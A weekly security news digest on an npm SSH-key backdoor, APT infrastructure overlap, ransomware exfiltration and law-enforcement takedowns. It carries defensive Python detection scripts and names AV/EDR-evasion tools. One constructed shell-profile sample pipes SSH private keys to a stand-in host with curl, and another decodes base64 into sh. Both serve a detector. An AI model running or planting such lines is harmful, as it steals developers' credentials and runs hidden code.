
Random in Security 202450


Random in Security is a summary of the week's cybersecurity news.

Interesting Reads

Typosquatted npm Packages Inject SSH Backdoor

Socket recently reported several malicious npm packages that typosquat popular libraries. Once installed, the packages modify the user's shell profiles (.bashrc, .zshrc) so that a backdoor script runs on every new shell and exfiltrates SSH private keys and known_hosts files. The campaign targeted developers on macOS and Linux, and the packages were downloaded hundreds of times before they were removed. Unlike earlier cases focused on credential harvesting or crypto mining, this one compromises the developer machine at the OS level, which can give the attacker a foothold in internal infrastructure or CI/CD pipelines. Since npm lifecycle scripts run with the installing user's privileges, installing with --ignore-scripts and reviewing install-time scripts before allowing them is the practical defence.
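As an added illustration (not Socket's code and not code from the reported packages), the Python below performs the two checks a developer would want after reading this: it scans a shell profile for lines of the kind an installer-planted backdoor leaves behind, and it lists installed npm packages that declare install-time lifecycle scripts. The profile text, the package tree (lodahs is a made-up typosquat) and the heuristics are constructed for the example.

```python
"""Two checks for the npm shell-profile backdoor pattern described above.

Added example, not Socket's code and not code from the reported packages.
The profile text, the package tree and the heuristics are constructed.
"""
import json
import os
import re
import tempfile

# What an installer-planted backdoor tends to leave in ~/.bashrc or ~/.zshrc:
# reads of SSH key material, a remote fetch piped into a shell, an embedded
# base64 blob handed to an interpreter, or a process backgrounded at login.
SUSPICIOUS_PATTERNS = [
    (r"~/\.ssh/|\$HOME/\.ssh/", "references the user's SSH directory"),
    (r"known_hosts|id_(rsa|ed25519|ecdsa)", "names SSH key or known_hosts files"),
    (r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b", "downloads a script and pipes it to a shell"),
    (r"base64\s+(-d|--decode)", "decodes an embedded base64 blob"),
    (r"\bnohup\b.*&\s*$", "backgrounds a long-running process at shell start"),
]


def find_suspicious_profile_lines(profile_text):
    """Return (line_no, line, reason) for each non-comment line matching a pattern."""
    hits = []
    for line_no, line in enumerate(profile_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if re.search(pattern, stripped):
                hits.append((line_no, stripped, reason))
                break  # report the first matching reason per line
    return hits


# Lifecycle hooks npm runs automatically during "npm install".
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def packages_with_install_scripts(node_modules_dir):
    """Walk node_modules and map package name -> {hook: command} for every
    package.json that declares an install-time lifecycle script."""
    found = {}
    for root, _dirs, files in os.walk(node_modules_dir):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(root, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: not our concern here
        scripts = manifest.get("scripts") or {}
        hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
        if hooks:
            found[manifest.get("name", os.path.relpath(root, node_modules_dir))] = hooks
    return found


# Constructed ~/.zshrc: two normal lines, then what a malicious postinstall appended.
SAMPLE_ZSHRC = """# constructed sample ~/.zshrc
export PATH="$HOME/.cargo/bin:$PATH"
alias ll='ls -la'
# --- appended by a malicious postinstall (constructed) ---
(cat ~/.ssh/id_rsa ~/.ssh/known_hosts 2>/dev/null | base64 | curl -s -X POST -d @- http://example.invalid/u) >/dev/null 2>&1 &
echo "ZWNobyBoaQ==" | base64 -d | sh
"""


def build_sample_node_modules():
    """Create a throwaway node_modules tree; "lodahs" is a made-up typosquat."""
    base = tempfile.mkdtemp(prefix="nm_")
    manifests = {
        "lodash": {"name": "lodash", "version": "4.17.21"},
        "lodahs": {"name": "lodahs", "version": "4.17.21",
                   "scripts": {"postinstall": "node ./lib/setup.js"}},
        "@types/node": {"name": "@types/node", "version": "20.0.0"},
    }
    for rel, manifest in manifests.items():
        pkg_dir = os.path.join(base, *rel.split("/"))
        os.makedirs(pkg_dir, exist_ok=True)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return base


if __name__ == "__main__":
    for line_no, line, reason in find_suspicious_profile_lines(SAMPLE_ZSHRC):
        print(f"~/.zshrc:{line_no}: {reason}\n    {line}")
    for name, hooks in packages_with_install_scripts(build_sample_node_modules()).items():
        print(f"{name}: runs {hooks}")
```

Run it against a real profile and a real node_modules by passing their contents and path, and combine it with npm install --ignore-scripts so that no lifecycle script runs before you have looked at it. The patterns are heuristics: a legitimate dotfile manager that syncs ~/.ssh trips the first one too, so treat hits as review items, not verdicts.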

Chinese cyber offensive ecosystem

Orange Cyberdefense uncovered a fascinating overlap in the infrastructure used by two seemingly unrelated APT groups, Turla and StrongPity. By analyzing historical DNS resolutions and TLS certificates, the team found reused or repurposed IP addresses and domains that point to possibly shared logistics or staging servers. This is not conclusive evidence of collaboration, but it raises questions about coordination, false flags, or compromised attacker infrastructure.
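To make the pivot concrete, here is an added example (not Orange Cyberdefense's tooling) in Python that takes passive-DNS style records for two activity clusters and reports the IPs both used, distinguishing concurrent use from sequential reuse and discarding infrastructure that many unrelated actors share. The records, domains, IP addresses and cluster names are constructed for the example and are not Turla or StrongPity indicators.

```python
"""Pivot on infrastructure shared by two activity clusters.

Added example, not Orange Cyberdefense's tooling. All records below are
constructed (example.invalid names, documentation IP ranges) to show the
method; none are real Turla or StrongPity indicators.
"""
from collections import defaultdict
from datetime import date

# Constructed passive-DNS style records: (cluster, domain, ip, first_seen, last_seen)
PDNS = [
    ("clusterA", "update-cdn.example.invalid", "203.0.113.10", date(2023, 1, 5),  date(2023, 6, 30)),
    ("clusterA", "sync.example.invalid",       "203.0.113.11", date(2023, 2, 1),  date(2023, 9, 1)),
    ("clusterA", "cdn.example.invalid",        "192.0.2.50",   date(2023, 1, 1),  date(2024, 1, 1)),
    ("clusterB", "files.example.invalid",      "203.0.113.10", date(2023, 8, 15), date(2024, 1, 10)),
    ("clusterB", "stage.example.invalid",      "203.0.113.11", date(2023, 5, 1),  date(2023, 7, 15)),
    ("clusterB", "mirror.example.invalid",     "198.51.100.7", date(2023, 3, 1),  date(2023, 12, 1)),
    ("clusterB", "cdn2.example.invalid",       "192.0.2.50",   date(2023, 1, 1),  date(2024, 1, 1)),
]

# Addresses many unrelated actors share (constructed): a public CDN edge, a
# sinkhole, a bulk VPS range. An overlap here says nothing about a link.
SHARED_INFRA = frozenset({"192.0.2.50"})


def windows_intersect(first_a, last_a, first_b, last_b):
    """True when two [first_seen, last_seen] intervals overlap in time."""
    return first_a <= last_b and first_b <= last_a


def infrastructure_overlaps(records, shared_infra=frozenset()):
    """Return one finding per IP resolved by domains of more than one cluster.

    kind is "concurrent" when at least one cross-cluster pair of resolutions
    overlapped in time (both used the host at once), "repurposed" when every
    cross-cluster pair is sequential (one cluster after the other), and
    "shared-hosting (discard)" when the IP is on the shared-infra list.
    """
    by_ip = defaultdict(list)
    for cluster, domain, ip, first, last in records:
        by_ip[ip].append((cluster, domain, first, last))

    findings = []
    for ip, uses in sorted(by_ip.items()):
        clusters = sorted({u[0] for u in uses})
        if len(clusters) < 2:
            continue
        if ip in shared_infra:
            findings.append({"ip": ip, "kind": "shared-hosting (discard)", "clusters": clusters})
            continue
        kind = "repurposed"
        for c1, _, f1, l1 in uses:
            for c2, _, f2, l2 in uses:
                # c1 < c2 visits each cross-cluster pair once and skips same-cluster pairs
                if c1 < c2 and windows_intersect(f1, l1, f2, l2):
                    kind = "concurrent"
        findings.append({
            "ip": ip,
            "kind": kind,
            "clusters": clusters,
            "domains": sorted(d for _, d, _, _ in uses),
        })
    return findings


if __name__ == "__main__":
    for f in infrastructure_overlaps(PDNS, SHARED_INFRA):
        print(f"{f['ip']:>14}  {f['kind']:<26} {', '.join(f['clusters'])}  {f.get('domains', '')}")
```

A "repurposed" hit is the weaker signal: hosting providers hand the same address to successive customers, so it needs a second pivot (a shared certificate, registrant or server fingerprint) before it means anything. A "concurrent" hit is stronger but still has benign explanations, which is why the shared-infrastructure list is applied before anything is reported.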

In this light, I would also like to highlight the article by Margin Research that examines the implications of the leak from Shanghai Anxun Information Co. (i-Soon), a Chinese cybersecurity contractor. The leak, which surfaced on February 16, 2024, includes internal documents, chat logs, and sales pitches, shedding light on China's offensive cyber capabilities and drawing parallels to Western entities such as NSO Group and Hacking Team.

Ransomware-driven data exfiltration: techniques and implications

This comprehensive CERT-EU report analyzes the data exfiltration techniques used by ransomware operators, with a focus on the double extortion model. It details common tools (Rclone, MEGA clients, FTP/SFTP scripts), newer channels (Telegram bots, Slack APIs), and the staging tactics used to avoid detection. The report also outlines the operational shift toward exfiltration-first strategies, where data theft precedes encryption or replaces it entirely: ransomware groups increasingly operate like mature data-breach actors, prioritizing stealthy exfiltration over noisy encryption.
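As an added example of the detection side (not part of the CERT-EU report), the Python below applies a few of the indicators the report lists to constructed process-creation and network-connection records: renamed rclone binaries recognised by their command line, MEGA client processes, and non-browser processes talking to the Telegram bot API or Slack webhooks. The log schema and every host, path and domain are constructed for this example.

```python
"""Flag exfiltration tooling of the kind the CERT-EU report catalogues.

Added example, not CERT-EU's. The records are constructed JSON lines in a
generic process / network shape, not any vendor's schema; hosts, paths and
domains are made up for the example.
"""
import json
import re

SAMPLE_LOGS = r"""
{"ts":"2024-12-09T01:12:03Z","host":"FS01","type":"process","image":"C:\\Users\\svc_backup\\AppData\\Local\\Temp\\svchost.exe","cmdline":"svchost.exe copy D:\\Finance remote:drop --transfers 32 --config C:\\Users\\Public\\r.conf"}
{"ts":"2024-12-09T01:12:40Z","host":"FS01","type":"process","image":"C:\\Tools\\rclone.exe","cmdline":"rclone.exe lsd remote:"}
{"ts":"2024-12-09T01:15:02Z","host":"WS17","type":"process","image":"C:\\Program Files\\MEGAcmd\\MEGAcmdServer.exe","cmdline":"MEGAcmdServer.exe"}
{"ts":"2024-12-09T01:20:11Z","host":"WS17","type":"network","image":"C:\\Windows\\System32\\curl.exe","dest":"api.telegram.org","dport":443,"bytes_out":52428800}
{"ts":"2024-12-09T01:21:00Z","host":"WS17","type":"network","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","dest":"hooks.slack.com","dport":443,"bytes_out":4096}
{"ts":"2024-12-09T01:22:30Z","host":"WS17","type":"network","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","dest":"api.telegram.org","dport":443,"bytes_out":12000}
{"ts":"2024-12-09T01:25:00Z","host":"WS17","type":"process","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe notes.txt"}
{"ts":"2024-12-09T01:26:00Z","host":"WS17","type":"network","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","dest":"www.example.com","dport":443,"bytes_out":800}
""".strip()

# Process names the report associates with bulk exfiltration (rclone, MEGA clients).
EXFIL_TOOL_NAMES = re.compile(r"^(rclone|megacmd\w*|megasync|megaclient)(\.exe)?$", re.I)
# Generic file-transfer clients: worth a look, but common in legitimate admin work.
TRANSFER_CLIENTS = re.compile(r"^(winscp|filezilla|ftp|sftp|scp)(\.exe)?$", re.I)
# rclone invocations survive renaming of the binary: "<subcommand> <src> <remote>:<path>".
# A remote name needs two or more characters so a bare drive letter ("E:") does not match.
RCLONE_CMDLINE = re.compile(r"\b(copy|sync|move|copyto)\s+\S+\s+[A-Za-z][A-Za-z0-9_-]+:", re.I)
# Channels the report lists as newer exfiltration paths; most specific first.
EXFIL_DESTINATIONS = [
    ("hooks.slack.com", "Slack incoming webhook"),
    ("slack.com", "Slack API"),
    ("api.telegram.org", "Telegram bot API"),
    ("mega.nz", "MEGA"),
    ("mega.co.nz", "MEGA"),
]
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
LARGE_UPLOAD_BYTES = 10_000_000


def basename(path):
    """Last path component, case-folded; handles both separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify(record):
    """Return (severity, reason) for one record, or None if nothing stands out."""
    image = basename(record.get("image", ""))
    if record.get("type") == "process":
        cmdline = record.get("cmdline", "")
        if EXFIL_TOOL_NAMES.match(image):
            return ("high", f"known exfiltration tool by name: {image}")
        if RCLONE_CMDLINE.search(cmdline):
            return ("high", f"rclone-style command line under unexpected image {image}: {cmdline}")
        if TRANSFER_CLIENTS.match(image):
            return ("medium", f"file transfer client started: {image}")
        return None
    if record.get("type") == "network":
        dest = record.get("dest", "").lower()
        bytes_out = record.get("bytes_out", 0)
        for suffix, label in EXFIL_DESTINATIONS:
            if dest == suffix or dest.endswith("." + suffix):
                if image in BROWSERS:
                    return ("low", f"browser traffic to {label} ({dest})")
                severity = "high" if bytes_out >= LARGE_UPLOAD_BYTES else "medium"
                return (severity, f"{image} -> {label} ({dest}), {bytes_out} bytes out")
    return None


def scan(log_text):
    """Parse JSON lines and return [(ts, host, severity, reason)] for every hit."""
    hits = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except ValueError:
            continue  # malformed line: skip it rather than abort the whole scan
        verdict = classify(record)
        if verdict:
            hits.append((record.get("ts"), record.get("host"), verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for ts, host, severity, reason in scan(SAMPLE_LOGS):
        print(f"{ts} {host} [{severity}] {reason}")
```

The command-line rule is the one that matters in practice: operators routinely rename rclone to a system binary name and drop it in a writable directory, so matching the image name alone misses the first record. Byte counts come from whatever network telemetry is available; the 10 MB threshold is a placeholder to tune per environment.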

Operation Passionflower

The MATRIX messaging service has been taken down by law enforcement in Operation Passionflower. This is not to be confused with the Matrix protocol. MATRIX is a criminal-oriented encrypted messaging service of the same kind as Sky ECC and EncroChat.

Europol's press release only says that "innovative technology" was used to intercept and decrypt messages; over three months, law enforcement monitored 2.3 million messages. They also set up a dedicated website for the operation, operation-passionflower.com.

Akira Rust Ransomware

Check Point analyzed a new Rust-based variant of Akira ransomware, a shift from the group's earlier C++ codebase. Functionally it is similar (encryption, lateral movement, ransom note deployment), but the Rust version offers better cross-platform support, a smaller binary, and obfuscation that is harder to analyze. The operators also adjusted the code to avoid encrypting Linux root directories, a mistake seen in earlier campaigns. This mirrors a broader trend of ransomware groups adopting Rust and Go for evasion, faster development, and easier multi-platform targeting.

Tools

  • Surveillance Watch - They Know Who You Are
  • fuffme - Target practice for ffuf
  • bunbuster - Ridiculously fast web & TCP fuzzer designed for brute-forcing directories, subdomains, and files on web servers
  • atomicgen.io - A simple tool designed to create Atomic Red Team tests with ease
  • SuperdEye - Indirect Syscall with TartarusGate Approach in Go
  • Acheron - Indirect syscalls for AV/EDR evasion in Go assembly
  • BananaPhone - A Go variant of Hell's Gate (calling Windows kernel functions directly, but from Go)
  • Hell’s Gate - Original C Implementation of the Hell’s Gate VX Technique